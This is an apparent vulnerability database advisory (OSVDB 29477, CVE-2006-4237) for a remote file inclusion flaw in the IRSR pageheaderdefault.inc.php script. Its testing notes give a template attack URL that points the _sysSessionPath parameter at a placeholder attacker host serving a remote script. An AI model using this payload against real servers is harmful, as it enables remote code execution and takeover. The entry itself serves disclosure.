Roaming System Remote (IRSR) pageheaderdefault.inc.php _sysSessionPath Variable Remote File Inclusion

2006-08-17T22:55:06
ID OSVDB:29477
Type osvdb
Reporter OSVDB
Modified 2006-08-17T22:55:06

Description

Manual Testing Notes

http://[target]/[IRSR_path]/system/includes/pageheaderdefault.inc.php?_sysSessionPath=[http://[attacker]/evil_scripts.txt]

References:

ISS X-Force ID: 28427
Generic Exploit URL: http://www.milw0rm.com/exploits/2199
CVE-2006-4237
Bugtraq ID: 19567